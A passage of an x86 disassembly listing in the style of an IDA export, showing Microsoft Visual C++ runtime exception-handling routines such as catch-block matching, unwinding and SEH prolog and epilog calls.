		push	offset dword_421990
		call	__SEH_prolog4
		mov	ebx, ecx
		mov	edi, [ebp+arg_4]
		mov	esi, [ebp+arg_0]
		mov	[ebp+var_1C], ebx
		and	[ebp+var_34], 0
		mov	eax, [edi-4]
		mov	[ebp+var_24], eax
		push	dword ptr [esi+18h]
		lea	eax, [ebp+var_3C]
		push	eax
		call	sub_404889
		pop	ecx
		pop	ecx
		mov	[ebp+var_28], eax
		call	sub_40574D
		mov	eax, [eax+88h]
		mov	[ebp+var_2C], eax
		call	sub_40574D
		mov	eax, [eax+8Ch]
		mov	[ebp+var_30], eax
		call	sub_40574D
		mov	[eax+88h], esi
		call	sub_40574D
		mov	ecx, [ebp+arg_8]
		mov	[eax+8Ch], ecx
		and	[ebp+ms_exc.disabled], 0
		xor	eax, eax
		inc	eax
		mov	[ebp+arg_8], eax
		mov	[ebp+ms_exc.disabled], eax
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	ebx
		push	[ebp+arg_C]
		push	edi
		call	sub_40491E
		add	esp, 14h
		mov	[ebp+var_1C], eax
		and	[ebp+ms_exc.disabled], 0
		jmp	short loc_40B9AB
; ---------------------------------------------------------------------------

loc_40B93C:				; DATA XREF: _1fieagrn:004219B0o
		mov	eax, [ebp+ms_exc.exc_ptr]
		call	sub_40B72C
		retn
; ---------------------------------------------------------------------------

loc_40B945:				; DATA XREF: _1fieagrn:004219B4o
		mov	esp, [ebp+ms_exc.old_esp]
		call	sub_40574D
		and	dword ptr [eax+20Ch], 0
		mov	esi, [ebp+arg_C]
		mov	edi, [ebp+arg_4]
		cmp	dword ptr [esi+4], 80h
		jg	short loc_40B969
		movsx	ecx, byte ptr [edi+8]
		jmp	short loc_40B96C
; ---------------------------------------------------------------------------

loc_40B969:				; CODE XREF: sub_40B8AC+B5j
		mov	ecx, [edi+8]

loc_40B96C:				; CODE XREF: sub_40B8AC+BBj
		mov	ebx, [esi+10h]
		and	[ebp+var_20], 0

loc_40B973:				; CODE XREF: sub_40B8AC+11Ej
		mov	eax, [ebp+var_20]
		cmp	eax, [esi+0Ch]
		jnb	short loc_40B993
		imul	eax, 14h
		add	eax, ebx
		mov	edx, [eax+4]
		cmp	ecx, edx
		jle	short loc_40B9C7
		cmp	ecx, [eax+8]
		jg	short loc_40B9C7
		mov	eax, [esi+8]
		mov	ecx, [eax+edx*8+8]

loc_40B993:				; CODE XREF: sub_40B8AC+CDj
		push	ecx
		push	esi
		push	0
		push	edi
		call	sub_40B64B
		add	esp, 10h
		and	[ebp+var_1C], 0
		and	[ebp+ms_exc.disabled], 0
		mov	esi, [ebp+arg_0]

loc_40B9AB:				; CODE XREF: sub_40B8AC+8Ej
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		mov	[ebp+arg_8], 0
		call	sub_40B9D2
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_40B8AC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40B8AC

loc_40B9C7:				; CODE XREF: sub_40B8AC+D9j
					; sub_40B8AC+DEj
		inc	[ebp+var_20]
		jmp	short loc_40B973
; END OF FUNCTION CHUNK	FOR sub_40B8AC

; =============== S U B	R O U T	I N E =======================================



sub_40B9CC	proc near		; DATA XREF: _1fieagrn:004219A8o
		mov	edi, [ebp+0Ch]
		mov	esi, [ebp+8]
sub_40B9CC	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40B9D2	proc near		; CODE XREF: sub_40B8AC+10Dp
		mov	eax, [ebp-24h]
		mov	[edi-4], eax
		push	dword ptr [ebp-28h]
		call	sub_4048D2
		pop	ecx
		call	sub_40574D
		mov	ecx, [ebp-2Ch]
		mov	[eax+88h], ecx
		call	sub_40574D
		mov	ecx, [ebp-30h]
		mov	[eax+8Ch], ecx
		cmp	dword ptr [esi], 0E06D7363h
		jnz	short locret_40BA47
		cmp	dword ptr [esi+10h], 3
		jnz	short locret_40BA47
		mov	eax, [esi+14h]
		cmp	eax, 19930520h
		jz	short loc_40BA23
		cmp	eax, 19930521h
		jz	short loc_40BA23
		cmp	eax, 19930522h
		jnz	short locret_40BA47

loc_40BA23:				; CODE XREF: sub_40B9D2+41j
					; sub_40B9D2+48j
		cmp	dword ptr [ebp-34h], 0
		jnz	short locret_40BA47
		cmp	dword ptr [ebp-1Ch], 0
		jz	short locret_40BA47
		push	dword ptr [esi+18h]
		call	sub_4048B1
		pop	ecx
		test	eax, eax
		jz	short locret_40BA47
		push	dword ptr [ebp+10h]
		push	esi
		call	sub_40B771
		pop	ecx
		pop	ecx

locret_40BA47:				; CODE XREF: sub_40B9D2+31j
					; sub_40B9D2+37j ...
		retn
sub_40B9D2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BA48	proc near		; CODE XREF: sub_40BBC7+36p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	0Ch
		push	offset dword_4219B8
		call	__SEH_prolog4
		xor	edx, edx
		mov	[ebp+var_1C], edx
		mov	eax, [ebp+arg_8]
		mov	ecx, [eax+4]
		cmp	ecx, edx
		jz	loc_40BBBF
		cmp	[ecx+8], dl
		jz	loc_40BBBF
		mov	ecx, [eax+8]
		cmp	ecx, edx
		jnz	short loc_40BA83
		test	dword ptr [eax], 80000000h
		jz	loc_40BBBF

loc_40BA83:				; CODE XREF: sub_40BA48+2Dj
		mov	eax, [eax]
		mov	esi, [ebp+arg_4]
		test	eax, eax
		js	short loc_40BA90
		lea	esi, [ecx+esi+0Ch]

loc_40BA90:				; CODE XREF: sub_40BA48+42j
		mov	[ebp+ms_exc.disabled], edx
		xor	ebx, ebx
		inc	ebx
		push	ebx
		test	al, 8
		jz	short loc_40BADC
		mov	edi, [ebp+arg_0]
		push	dword ptr [edi+18h]
		call	sub_410561
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_40BBA2
		push	ebx
		push	esi
		call	sub_410561
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_40BBA2
		mov	eax, [edi+18h]
		mov	[esi], eax
		mov	ecx, [ebp+arg_C]
		add	ecx, 8
		push	ecx

loc_40BACD:				; CODE XREF: sub_40BA48+E7j
		push	eax
		call	sub_40B7C5
		pop	ecx
		pop	ecx
		mov	[esi], eax
		jmp	loc_40BBA7
; ---------------------------------------------------------------------------

loc_40BADC:				; CODE XREF: sub_40BA48+51j
		mov	edi, [ebp+arg_C]
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax+18h]
		test	[edi], bl
		jz	short loc_40BB31
		call	sub_410561
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_40BBA2
		push	ebx
		push	esi
		call	sub_410561
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_40BBA2
		push	dword ptr [edi+14h]
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax+18h]
		push	esi
		call	sub_407720
		add	esp, 0Ch
		cmp	dword ptr [edi+14h], 4
		jnz	loc_40BBA7
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_40BBA7
		add	edi, 8
		push	edi
		jmp	short loc_40BACD
; ---------------------------------------------------------------------------

loc_40BB31:				; CODE XREF: sub_40BA48+9Fj
		cmp	[edi+18h], edx
		jnz	short loc_40BB6E
		call	sub_410561
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40BBA2
		push	ebx
		push	esi
		call	sub_410561
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40BBA2
		push	dword ptr [edi+14h]
		add	edi, 8
		push	edi
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax+18h]
		call	sub_40B7C5
		pop	ecx
		pop	ecx
		push	eax
		push	esi
		call	sub_407720
		add	esp, 0Ch
		jmp	short loc_40BBA7
; ---------------------------------------------------------------------------

loc_40BB6E:				; CODE XREF: sub_40BA48+ECj
		call	sub_410561
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40BBA2
		push	ebx
		push	esi
		call	sub_410561
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40BBA2
		push	dword ptr [edi+18h]
		call	sub_410561
		pop	ecx
		test	eax, eax
		jz	short loc_40BBA2
		test	byte ptr [edi],	4
		push	0
		pop	eax
		setnz	al
		inc	eax
		mov	[ebp+var_1C], eax
		jmp	short loc_40BBA7
; ---------------------------------------------------------------------------

loc_40BBA2:				; CODE XREF: sub_40BA48+62j
					; sub_40BA48+73j ...
		call	sub_40C254

loc_40BBA7:				; CODE XREF: sub_40BA48+8Fj
					; sub_40BA48+D7j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		mov	eax, [ebp+var_1C]
		jmp	short loc_40BBC1
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		jmp	sub_40C208
; ---------------------------------------------------------------------------

loc_40BBBF:				; CODE XREF: sub_40BA48+19j
					; sub_40BA48+22j ...
		xor	eax, eax

loc_40BBC1:				; CODE XREF: sub_40BA48+169j
		call	__SEH_epilog4
		retn
sub_40BA48	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BBC7	proc near		; CODE XREF: sub_40BC58+11p

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	8
		push	offset dword_4219D8
		call	__SEH_prolog4
		mov	eax, [ebp+arg_8]
		test	dword ptr [eax], 80000000h
		jz	short loc_40BBE3
		mov	ebx, [ebp+arg_4]
		jmp	short loc_40BBED
; ---------------------------------------------------------------------------

loc_40BBE3:				; CODE XREF: sub_40BBC7+15j
		mov	ecx, [eax+8]
		mov	edx, [ebp+arg_4]
		lea	ebx, [ecx+edx+0Ch]

loc_40BBED:				; CODE XREF: sub_40BBC7+1Aj
		and	[ebp+ms_exc.disabled], 0
		mov	esi, [ebp+arg_C]
		push	esi
		push	eax
		push	[ebp+arg_4]
		mov	edi, [ebp+arg_0]
		push	edi
		call	sub_40BA48
		add	esp, 10h
		dec	eax
		jz	short loc_40BC27
		dec	eax
		jnz	short loc_40BC3F
		push	1
		lea	eax, [esi+8]
		push	eax
		push	dword ptr [edi+18h]
		call	sub_40B7C5
		pop	ecx
		pop	ecx
		push	eax
		push	dword ptr [esi+18h]
		push	ebx
		call	sub_4045E5
		jmp	short loc_40BC3F
; ---------------------------------------------------------------------------

loc_40BC27:				; CODE XREF: sub_40BBC7+3Fj
		lea	eax, [esi+8]
		push	eax
		push	dword ptr [edi+18h]
		call	sub_40B7C5
		pop	ecx
		pop	ecx
		push	eax
		push	dword ptr [esi+18h]
		push	ebx
		call	sub_4045E5

loc_40BC3F:				; CODE XREF: sub_40BBC7+42j
					; sub_40BBC7+5Ej
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	__SEH_epilog4
		retn
sub_40BBC7	endp

; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		jmp	sub_40C208

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BC58	proc near		; CODE XREF: sub_40BCC4+D4p
					; sub_40BDB6+25Dp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		cmp	[ebp+arg_10], 0
		jz	short loc_40BC71
		push	[ebp+arg_10]
		push	ebx
		push	esi
		push	[ebp+arg_0]
		call	sub_40BBC7
		add	esp, 10h

loc_40BC71:				; CODE XREF: sub_40BC58+7j
		cmp	[ebp+arg_18], 0
		push	[ebp+arg_0]
		jnz	short loc_40BC7D
		push	esi
		jmp	short loc_40BC80
; ---------------------------------------------------------------------------

loc_40BC7D:				; CODE XREF: sub_40BC58+20j
		push	[ebp+arg_18]

loc_40BC80:				; CODE XREF: sub_40BC58+23j
		call	sub_4045EC
		push	dword ptr [edi]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	esi
		call	sub_40B64B
		mov	eax, [edi+4]
		push	100h
		push	[ebp+arg_14]
		inc	eax
		push	[ebp+arg_C]
		mov	[esi+8], eax
		push	[ebp+arg_4]
		mov	ecx, [ebx+0Ch]
		push	esi
		push	[ebp+arg_0]
		call	sub_40B8AC
		add	esp, 28h
		test	eax, eax
		jz	short loc_40BCC2
		push	esi
		push	eax
		call	sub_4045B5

loc_40BCC2:				; CODE XREF: sub_40BC58+61j
		pop	ebp
		retn
sub_40BC58	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BCC4	proc near		; CODE XREF: sub_40BDB6+336p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	esi
		mov	esi, [ebp+arg_0]
		cmp	dword ptr [esi], 80000003h
		jz	loc_40BDB3
		push	edi
		call	sub_40574D
		cmp	dword ptr [eax+80h], 0
		jz	short loc_40BD27
		call	sub_40574D
		lea	edi, [eax+80h]
		call	sub_40553A
		cmp	[edi], eax
		jz	short loc_40BD27
		cmp	dword ptr [esi], 0E0434F4Dh
		jz	short loc_40BD27
		push	[ebp+arg_1C]
		push	[ebp+arg_18]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	esi
		call	sub_4046A4
		add	esp, 1Ch
		test	eax, eax
		jnz	loc_40BDB2

loc_40BD27:				; CODE XREF: sub_40BCC4+22j
					; sub_40BCC4+36j ...
		mov	edi, [ebp+arg_10]
		cmp	dword ptr [edi+0Ch], 0
		jnz	short loc_40BD35
		call	sub_40C254

loc_40BD35:				; CODE XREF: sub_40BCC4+6Aj
		mov	esi, [ebp+arg_14]
		lea	eax, [ebp+var_8]
		push	eax
		lea	eax, [ebp+var_4]
		push	eax
		push	esi
		push	[ebp+arg_18]
		push	edi
		call	sub_404816
		mov	edi, eax
		mov	eax, [ebp+var_4]
		add	esp, 14h
		cmp	eax, [ebp+var_8]
		jnb	short loc_40BDB2
		push	ebx

loc_40BD58:				; CODE XREF: sub_40BCC4+EBj
		cmp	esi, [edi]
		jl	short loc_40BDA3
		cmp	esi, [edi+4]
		jg	short loc_40BDA3
		mov	eax, [edi+0Ch]
		mov	ecx, [edi+10h]
		shl	eax, 4
		add	eax, ecx
		mov	ecx, [eax-0Ch]
		test	ecx, ecx
		jz	short loc_40BD79
		cmp	byte ptr [ecx+8], 0
		jnz	short loc_40BDA3

loc_40BD79:				; CODE XREF: sub_40BCC4+ADj
		lea	ebx, [eax-10h]
		test	byte ptr [ebx],	40h
		jnz	short loc_40BDA3
		push	[ebp+arg_1C]
		mov	esi, [ebp+arg_4]
		push	[ebp+arg_18]
		push	0
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_0]
		call	sub_40BC58
		mov	esi, [ebp+arg_14]
		add	esp, 1Ch

loc_40BDA3:				; CODE XREF: sub_40BCC4+96j
					; sub_40BCC4+9Bj ...
		inc	[ebp+var_4]
		mov	eax, [ebp+var_4]
		add	edi, 14h
		cmp	eax, [ebp+var_8]
		jb	short loc_40BD58
		pop	ebx

loc_40BDB2:				; CODE XREF: sub_40BCC4+5Dj
					; sub_40BCC4+91j
		pop	edi

loc_40BDB3:				; CODE XREF: sub_40BCC4+Fj
		pop	esi
		leave
		retn
sub_40BCC4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BDB6	proc near		; CODE XREF: sub_40C124+D4p

var_2C		= dword	ptr -2Ch
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_1		= byte ptr -1
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= byte ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	ecx, [ebp+arg_4]
		push	ebx
		mov	ebx, [ebp+arg_10]
		mov	eax, [ebx+4]
		cmp	eax, 80h
		push	esi
		push	edi
		mov	[ebp+var_1], 0
		jg	short loc_40BDD9
		movsx	ecx, byte ptr [ecx+8]
		jmp	short loc_40BDDC
; ---------------------------------------------------------------------------

loc_40BDD9:				; CODE XREF: sub_40BDB6+1Bj
		mov	ecx, [ecx+8]

loc_40BDDC:				; CODE XREF: sub_40BDB6+21j
		cmp	ecx, 0FFFFFFFFh
		mov	[ebp+var_8], ecx
		jl	short loc_40BDE8
		cmp	ecx, eax
		jl	short loc_40BDED

loc_40BDE8:				; CODE XREF: sub_40BDB6+2Cj
		call	sub_40C254

loc_40BDED:				; CODE XREF: sub_40BDB6+30j
		mov	esi, [ebp+arg_0]
		mov	edi, 0E06D7363h
		cmp	[esi], edi
		jnz	loc_40C0C8
		cmp	dword ptr [esi+10h], 3
		mov	ebx, 19930520h
		jnz	loc_40BF35
		mov	eax, [esi+14h]
		cmp	eax, ebx
		jz	short loc_40BE25
		cmp	eax, 19930521h
		jz	short loc_40BE25
		cmp	eax, 19930522h
		jnz	loc_40BF35

loc_40BE25:				; CODE XREF: sub_40BDB6+5Bj
					; sub_40BDB6+62j
		cmp	dword ptr [esi+1Ch], 0
		jnz	loc_40BF35
		call	sub_40574D
		cmp	dword ptr [eax+88h], 0
		jz	loc_40C107
		call	sub_40574D
		mov	esi, [eax+88h]
		mov	[ebp+arg_0], esi
		call	sub_40574D
		mov	eax, [eax+8Ch]
		push	1
		push	esi
		mov	[ebp+arg_8], eax
		call	sub_410561
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_40BE70
		call	sub_40C254

loc_40BE70:				; CODE XREF: sub_40BDB6+B3j
		cmp	[esi], edi
		jnz	short loc_40BE9A
		cmp	dword ptr [esi+10h], 3
		jnz	short loc_40BE9A
		mov	eax, [esi+14h]
		cmp	eax, ebx
		jz	short loc_40BE8F
		cmp	eax, 19930521h
		jz	short loc_40BE8F
		cmp	eax, 19930522h
		jnz	short loc_40BE9A

loc_40BE8F:				; CODE XREF: sub_40BDB6+C9j
					; sub_40BDB6+D0j
		cmp	dword ptr [esi+1Ch], 0
		jnz	short loc_40BE9A
		call	sub_40C254

loc_40BE9A:				; CODE XREF: sub_40BDB6+BCj
					; sub_40BDB6+C2j ...
		call	sub_40574D
		cmp	dword ptr [eax+94h], 0
		jz	loc_40BF35
		call	sub_40574D
		mov	edi, [eax+94h]
		call	sub_40574D
		push	[ebp+arg_0]
		xor	esi, esi
		mov	[eax+94h], esi
		call	sub_40B7EA
		test	al, al
		pop	ecx
		jnz	short loc_40BF2D
		xor	ebx, ebx
		cmp	[edi], ebx
		jle	short loc_40BEF4

loc_40BED7:				; CODE XREF: sub_40BDB6+13Cj
		mov	eax, [edi+4]
		mov	ecx, [ebx+eax+4]
		push	offset off_423E50
		call	sub_4033D7
		test	al, al
		jnz	short loc_40BEF9
		inc	esi
		add	ebx, 10h
		cmp	esi, [edi]
		jl	short loc_40BED7

loc_40BEF4:				; CODE XREF: sub_40BDB6+11Fj
					; sub_40BDB6+31Cj
		jmp	sub_40C208
; ---------------------------------------------------------------------------

loc_40BEF9:				; CODE XREF: sub_40BDB6+134j
		push	1
		push	[ebp+arg_0]
		call	sub_40B771
		pop	ecx
		pop	ecx
		lea	eax, [ebp+arg_0]
		push	eax
		lea	ecx, [ebp+var_2C]
		mov	[ebp+arg_0], offset dword_41DC3C
		call	sub_402FCC
		push	offset dword_4219F4
		lea	eax, [ebp+var_2C]
		push	eax
		mov	[ebp+var_2C], offset off_41DC34
		call	sub_40456B

loc_40BF2D:				; CODE XREF: sub_40BDB6+119j
		mov	esi, [ebp+arg_0]
		mov	edi, 0E06D7363h

loc_40BF35:				; CODE XREF: sub_40BDB6+50j
					; sub_40BDB6+69j ...
		cmp	[esi], edi
		jnz	loc_40C0C5
		cmp	dword ptr [esi+10h], 3
		jnz	loc_40C0C5
		mov	eax, [esi+14h]
		cmp	eax, ebx
		jz	short loc_40BF60
		cmp	eax, 19930521h
		jz	short loc_40BF60
		cmp	eax, 19930522h
		jnz	loc_40C0C5

loc_40BF60:				; CODE XREF: sub_40BDB6+196j
					; sub_40BDB6+19Dj
		mov	edi, [ebp+arg_10]
		cmp	dword ptr [edi+0Ch], 0
		jbe	loc_40C02C
		lea	eax, [ebp+var_1C]
		push	eax
		lea	eax, [ebp+var_10]
		push	eax
		push	[ebp+var_8]
		push	[ebp+arg_18]
		push	edi
		call	sub_404816
		add	esp, 14h
		mov	edi, eax

loc_40BF86:				; CODE XREF: sub_40BDB6+26Ej
		mov	eax, [ebp+var_10]
		cmp	eax, [ebp+var_1C]
		jnb	loc_40C029
		mov	eax, [ebp+var_8]
		cmp	[edi], eax
		jg	loc_40C01E
		cmp	eax, [edi+4]
		jg	short loc_40C01E
		mov	eax, [edi+10h]
		mov	[ebp+var_C], eax
		mov	eax, [edi+0Ch]
		test	eax, eax
		mov	[ebp+var_18], eax
		jle	short loc_40C01E

loc_40BFB2:				; CODE XREF: sub_40BDB6+23Cj
		mov	eax, [esi+1Ch]
		mov	eax, [eax+0Ch]
		lea	ebx, [eax+4]
		mov	eax, [eax]
		test	eax, eax
		mov	[ebp+var_14], eax
		jle	short loc_40BFE7

loc_40BFC4:				; CODE XREF: sub_40BDB6+22Fj
		push	dword ptr [esi+1Ch]
		mov	eax, [ebx]
		push	eax
		push	[ebp+var_C]
		mov	[ebp+var_20], eax
		call	sub_40B5AB
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_40BFF6
		dec	[ebp+var_14]
		add	ebx, 4
		cmp	[ebp+var_14], eax
		jg	short loc_40BFC4

loc_40BFE7:				; CODE XREF: sub_40BDB6+20Cj
		dec	[ebp+var_18]
		add	[ebp+var_C], 10h
		cmp	[ebp+var_18], 0
		jg	short loc_40BFB2
		jmp	short loc_40C01E
; ---------------------------------------------------------------------------

loc_40BFF6:				; CODE XREF: sub_40BDB6+224j
		push	[ebp+arg_1C]
		mov	ebx, [ebp+var_C]
		push	[ebp+arg_18]
		mov	[ebp+var_1], 1
		push	[ebp+var_20]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	esi
		mov	esi, [ebp+arg_4]
		call	sub_40BC58
		mov	esi, [ebp+arg_0]
		add	esp, 1Ch

loc_40C01E:				; CODE XREF: sub_40BDB6+1E1j
					; sub_40BDB6+1EAj ...
		inc	[ebp+var_10]
		add	edi, 14h
		jmp	loc_40BF86
; ---------------------------------------------------------------------------

loc_40C029:				; CODE XREF: sub_40BDB6+1D6j
		mov	edi, [ebp+arg_10]

loc_40C02C:				; CODE XREF: sub_40BDB6+1B1j
		cmp	[ebp+arg_14], 0
		jz	short loc_40C03C
		push	1
		push	esi
		call	sub_40B771
		pop	ecx
		pop	ecx

loc_40C03C:				; CODE XREF: sub_40BDB6+27Aj
		cmp	[ebp+var_1], 0
		jnz	loc_40C0F4
		mov	eax, [edi]
		and	eax, 1FFFFFFFh
		cmp	eax, 19930521h
		jb	loc_40C0F4
		mov	edi, [edi+1Ch]
		test	edi, edi
		jz	loc_40C0F4
		push	esi
		call	sub_40B7EA
		test	al, al
		pop	ecx
		jnz	loc_40C0F4
		call	sub_40574D
		call	sub_40574D
		call	sub_40574D
		mov	[eax+88h], esi
		call	sub_40574D
		cmp	[ebp+arg_1C], 0
		mov	ecx, [ebp+arg_8]
		mov	[eax+8Ch], ecx
		push	esi
		jnz	short loc_40C0A1
		push	[ebp+arg_4]
		jmp	short loc_40C0A4
; ---------------------------------------------------------------------------

loc_40C0A1:				; CODE XREF: sub_40BDB6+2E4j
		push	[ebp+arg_1C]

loc_40C0A4:				; CODE XREF: sub_40BDB6+2E9j
		call	sub_4045EC
		mov	esi, [ebp+arg_10]
		push	0FFFFFFFFh
		push	esi
		push	[ebp+arg_C]
		push	[ebp+arg_4]
		call	sub_40B64B
		add	esp, 10h
		push	dword ptr [esi+1Ch]
		call	sub_40B863

loc_40C0C5:				; CODE XREF: sub_40BDB6+181j
					; sub_40BDB6+18Bj ...
		mov	ebx, [ebp+arg_10]

loc_40C0C8:				; CODE XREF: sub_40BDB6+41j
		cmp	dword ptr [ebx+0Ch], 0
		jbe	short loc_40C0F4
		cmp	[ebp+arg_14], 0
		jnz	loc_40BEF4
		push	[ebp+arg_1C]
		push	[ebp+arg_18]
		push	[ebp+var_8]
		push	ebx
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	esi
		call	sub_40BCC4
		add	esp, 20h

loc_40C0F4:				; CODE XREF: sub_40BDB6+28Aj
					; sub_40BDB6+29Cj ...
		call	sub_40574D
		cmp	dword ptr [eax+94h], 0
		jz	short loc_40C107
		call	sub_40C254

loc_40C107:				; CODE XREF: sub_40BDB6+85j
					; sub_40BDB6+34Aj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_40BDB6	endp

; ---------------------------------------------------------------------------
		push	esi
		push	dword ptr [esp+8]
		mov	esi, ecx
		call	sub_403032
		mov	dword ptr [esi], offset	off_41DC34
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C124	proc near		; CODE XREF: sub_40463E+21p
					; .text:0040469Ap ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		push	edi
		call	sub_40574D
		cmp	dword ptr [eax+20Ch], 0
		mov	eax, [ebp+arg_10]
		mov	ecx, [ebp+arg_0]
		mov	edi, 0E06D7363h
		mov	esi, 1FFFFFFFh
		mov	ebx, 19930522h
		jnz	short loc_40C16D
		mov	edx, [ecx]
		cmp	edx, edi
		jz	short loc_40C16D
		cmp	edx, 80000026h
		jz	short loc_40C16D
		mov	edx, [eax]
		and	edx, esi
		cmp	edx, ebx
		jb	short loc_40C16D
		test	byte ptr [eax+20h], 1
		jnz	loc_40C200

loc_40C16D:				; CODE XREF: sub_40C124+27j
					; sub_40C124+2Dj ...
		test	byte ptr [ecx+4], 66h
		jz	short loc_40C196
		cmp	dword ptr [eax+4], 0
		jz	loc_40C200
		cmp	[ebp+arg_14], 0
		jnz	short loc_40C200
		push	0FFFFFFFFh
		push	eax
		push	[ebp+arg_C]
		push	[ebp+arg_4]
		call	sub_40B64B
		add	esp, 10h
		jmp	short loc_40C200
; ---------------------------------------------------------------------------

loc_40C196:				; CODE XREF: sub_40C124+4Dj
		cmp	dword ptr [eax+0Ch], 0
		jnz	short loc_40C1AE
		mov	edx, [eax]
		and	edx, esi
		cmp	edx, 19930521h
		jb	short loc_40C200
		cmp	dword ptr [eax+1Ch], 0
		jz	short loc_40C200

loc_40C1AE:				; CODE XREF: sub_40C124+76j
		cmp	[ecx], edi
		jnz	short loc_40C1E4
		cmp	dword ptr [ecx+10h], 3
		jb	short loc_40C1E4
		cmp	[ecx+14h], ebx
		jbe	short loc_40C1E4
		mov	edx, [ecx+1Ch]
		mov	edx, [edx+8]
		test	edx, edx
		jz	short loc_40C1E4
		movzx	esi, byte ptr [ebp+arg_1C]
		push	esi
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	eax
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	ecx
		call	edx
		add	esp, 20h
		jmp	short loc_40C203
; ---------------------------------------------------------------------------

loc_40C1E4:				; CODE XREF: sub_40C124+8Cj
					; sub_40C124+92j ...
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_1C]
		push	eax
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	ecx
		call	sub_40BDB6
		add	esp, 20h

loc_40C200:				; CODE XREF: sub_40C124+43j
					; sub_40C124+53j ...
		xor	eax, eax
		inc	eax

loc_40C203:				; CODE XREF: sub_40C124+BEj
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_40C124	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C208	proc near		; CODE XREF: sub_40B4CD:loc_40B501p
					; sub_40B607+22j ...

ms_exc		= CPPEH_RECORD ptr -18h

; FUNCTION CHUNK AT 0040C22F SIZE 00000012 BYTES

		push	8
		push	offset dword_421A30
		call	__SEH_prolog4
		call	sub_40574D
		mov	eax, [eax+78h]
		test	eax, eax
		jz	short loc_40C236
		and	[ebp+ms_exc.disabled], 0
		call	eax
		jmp	short loc_40C22F
sub_40C208	endp

; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
; START	OF FUNCTION CHUNK FOR sub_40C208

loc_40C22F:				; CODE XREF: sub_40C208+1Ej
